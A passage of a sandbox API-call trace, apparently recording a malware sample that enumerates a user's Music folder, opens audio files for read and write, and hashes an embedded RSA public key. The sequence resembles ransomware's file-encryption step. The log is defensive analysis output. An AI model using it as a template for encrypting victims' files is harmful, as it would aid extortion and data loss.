lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0190.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0190.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0190.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.087] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\pE 0cUon\\") returned="pE 0cUon\\" [0190.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0190.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39528 [0190.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.087] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0190.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0190.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39528 | out: hHeap=0x6a0000) returned 1 [0190.088] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0190.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0190.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.088] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0190.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.089] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0190.089] PathFindFileNameW (pszPath="") returned="" [0190.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.089] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\pE 0cUon\\*" (normalized: "c:\\users\\keecfmwgj\\music\\pe 0cuon\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734c7310, ftCreationTime.dwHighDateTime=0x1d898cc, ftLastAccessTime.dwLowDateTime=0xab57b2a0, ftLastAccessTime.dwHighDateTime=0x1d8a31d, ftLastWriteTime.dwLowDateTime=0xab57b2a0, ftLastWriteTime.dwHighDateTime=0x1d8a31d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0190.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.093] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734c7310, ftCreationTime.dwHighDateTime=0x1d898cc, ftLastAccessTime.dwLowDateTime=0xab57b2a0, ftLastAccessTime.dwHighDateTime=0x1d8a31d, ftLastWriteTime.dwLowDateTime=0xab57b2a0, ftLastWriteTime.dwHighDateTime=0x1d8a31d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0190.093] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe33bc730, ftCreationTime.dwHighDateTime=0x1d8a4d3, ftLastAccessTime.dwLowDateTime=0xf164d450, ftLastAccessTime.dwHighDateTime=0x1d8a5aa, ftLastWriteTime.dwLowDateTime=0xf164d450, ftLastWriteTime.dwHighDateTime=0x1d8a5aa, nFileSizeHigh=0x0, nFileSizeLow=0x165a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="I_smja7ZftD 88.wav", cAlternateFileName="I_SMJA~1.WAV")) returned 1 [0190.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x76) returned 0x723d10 [0190.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.093] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\pE 0cUon\\I_smja7ZftD 88.wav") returned=".wav" [0190.093] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\pE 0cUon\\I_smja7ZftD 88.wav" (normalized: "c:\\users\\keecfmwgj\\music\\pe 0cuon\\i_smja7zftd 88.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.097] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=91552) returned 1 [0190.097] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0190.101] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1657a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.101] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0190.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0190.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.105] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.105] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x165a0, lpOverlapped=0x0) returned 1 [0190.106] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0190.107] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.107] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.107] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0190.109] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0190.109] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.109] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0190.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0190.109] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0190.109] GetLastError () returned 0x0 [0190.109] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0190.109] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0190.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0190.110] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0190.110] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0190.110] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.110] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0190.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.110] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0190.110] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x165a0) returned 0x2d45778 [0190.111] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0190.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0190.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0190.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39528 [0190.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a78 [0190.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39570 [0190.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a90 [0190.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ac0 [0190.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b20 [0190.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ad8 [0190.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0190.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0190.112] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0190.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0190.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ac0 | out: hHeap=0x6a0000) returned 1 [0190.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ad8 | out: hHeap=0x6a0000) returned 1 [0190.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b20 | out: hHeap=0x6a0000) returned 1 [0190.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0190.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b20 [0190.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0190.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ad8 [0190.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0190.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39ac0 [0190.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0190.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0190.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0190.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0190.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0190.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0190.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0190.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0190.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: 